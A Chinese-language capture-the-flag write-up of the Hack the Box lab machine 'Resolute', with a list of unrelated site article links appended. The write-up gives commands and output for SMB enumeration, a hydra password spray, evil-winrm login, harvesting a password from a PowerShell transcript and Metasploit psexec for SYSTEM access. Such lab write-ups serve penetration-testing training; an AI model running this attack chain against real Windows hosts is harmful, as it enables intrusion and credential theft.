Hack the Box – Resolute

简介: Hack the Box – Resolute

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Resolute”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。

信息收集

       连接ovpn,获取内网IP,先用nmap对目标主机扫一遍,进行信息收集,获取开放的端口和服务。

 640.jpg

l 探测开放端口与服务

 640.jpg

l 发现端口88、135、139、389、445、3268等一些存活的端口。

l 其中445端口使用的是smb服务。

l 再次利用enum4linux扫描(enum4linux可用于枚举Windows和Samba主机中的数据),获得有价值信息。

640.jpg

爆破连接

l 使用smbclient连接marko,连接失败

640.png

l 猜想:虽然无法连接,但是也许可以进行用户名爆破。利用enumlinux4扫描出的用户名组成字典文本account,使用密码Welcome123!,结合hydra工具爆破出用户名。

640.jpg

640.png

hydra -L /home/resolute/account.txt -p Welcome123! 10.10.10.169 smb

l 结果显示存在用户名melanie可登录,利用smbclient进行登录。

[445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!

 640.jpg

l 再次使用smbclient工具,尝试使用账号melanie,密码Welcome123!进行连接。

 640.jpg

l 接下来尝试使用melanie 账号,利用evil-winrm(一款可用于黑客攻击/渗透测试的Windows远程管理(WinRM) Shell工具)进行登录

ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169
root@kali:/home/resolute/evil-winrm# ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> cd /Users
*Evil-WinRM* PS C:\Users> ls
    Directory: C:\Users
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        1/18/2020   3:28 AM                ryan

l 获得Users权限,并发现ryan用户

提权

*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /groups                                                                                                              
GROUP INFORMATION                                                                                                                                                     
-----------------                                                                                                                                                     
Group Name                                 Type             SID          Attributes                                                                                   
========================================== ================ ============ ==================================================                                           
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group

l 成功登录

l 浏览C盘所有文件(包括隐藏文件),查看能否获取到敏感信息。

*Evil-WinRM* PS C:\> ls -hidden
    Directory: C:\
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        1/17/2020   5:52 PM      402653184 pagefile.sys

l 进入PSTranscripts文件夹中,发现了日志文件20191203063201.txt,打开日志文件

*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden
    Directory: C:\PSTranscripts\20191203
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression">> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

l 得到rayn的密码 Serv3r4Admin4cc123!

l 使用模块msf的psexec_psh,配置好目标IP,用户名、密码,开始利用。

 640.png

l 成功获取system权限

 640.png

总结:

1、 信息收集过程中要利用好每个信息,尝试找到突破口(smb服务)。

2、 熟练使用工具enum4linux、evil-winrm、msf等工具,提高效率。

3、 应多尝试,从多方面入手,找不到密码可以从账号入手等等。

4、 要加强学习,增进对漏洞的认识与利用,才能不断进步。

相关文章
|
弹性计算 数据可视化 关系型数据库
【最佳实践】Filebeat实现MySQL日志轻量化发送至Elasticsearch
在今天的文章中,我们来详细地描述如果使用Filebeat把MySQL的日志信息传输到Elasticsearch中。
4885 0
【最佳实践】Filebeat实现MySQL日志轻量化发送至Elasticsearch
|
消息中间件 数据可视化 关系型数据库
(3)sparkstreaming从kafka接入实时数据流最终实现数据可视化展示
1)我们通过kafka与各个业务系统的数据对接,将各系统中的数据实时接到kafka; 2)通过sparkstreaming接入kafka数据流,定义时间窗口和计算窗口大小,业务计算逻辑处理; 3)将结果数据写入到mysql; 4)通过可视化平台接入mysql数据库,这里使用的是NBI大数据可视化构建平台; 5)在平台上通过拖拽式构建各种数据应用,数据展示;
(3)sparkstreaming从kafka接入实时数据流最终实现数据可视化展示
|
存储 Docker 容器
Docker Volumes卷详解及时区、时间同步设置技巧
总的来说,Docker卷是一种强大的数据持久化和数据共享工具,而Docker的时区和时间同步设置则可以帮助你更好地管理和使用你的容器。希望这些信息能够帮助你更好地理解和使用Docker。
515 75
|
缓存 负载均衡 API
抖音抖店API请求获取宝贝详情数据、原价、销量、主图等参数可支持高并发调用接入演示
这是一个使用Python编写的示例代码,用于从抖音抖店API获取商品详情,包括原价、销量和主图等信息。示例展示了如何构建请求、处理响应及提取所需数据。针对高并发场景,建议采用缓存、限流、负载均衡、异步处理及代码优化等策略,以提升性能和稳定性。
|
开发者
【 uniapp - 黑马优购 | 商品列表 】如何实现数据获取、结构渲染、自定义组件的封装
【 uniapp - 黑马优购 | 商品列表 】如何实现数据获取、结构渲染、自定义组件的封装
712 0
|
机器学习/深度学习 监控 安全
人脸识别
人脸识别
721 1
|
人工智能 光互联 数据中心
800G光模块面对AI发展的增长之路
光模块市场因AI驱动的算力需求增长而加速发展,800G产品需求强劲,预计未来几年市场规模将以每年约11%的复合年增长率扩张。尽管面临价格竞争和原材料供应紧张的挑战,800G光模块将于2024年迎来大规模出货,而2025年将启动1.6T光模块商用周期。随着技术迭代加快和高端产品放量,行业头部企业将受益,光通信行业将迎来黄金时期。
437 0
800G光模块面对AI发展的增长之路
|
分布式计算 资源调度 监控
Spark学习--1、Spark入门(Spark概述、Spark部署、Local模式、Standalone模式、Yarn模式)(一)
Spark学习--1、Spark入门(Spark概述、Spark部署、Local模式、Standalone模式、Yarn模式)(一)
503 1
|
Java 数据库 Docker
Java 入门指南:使用 Docker 创建容器化 Spring Boot 应用程序
接下来,我们需要创建一个 Dockerfile,其中包含了构建 Java 映像所需的指令。在 Spring Boot 项目的根目录下创建一个名为 Dockerfile 的文件,并将以下内容添加到其中:
2231 0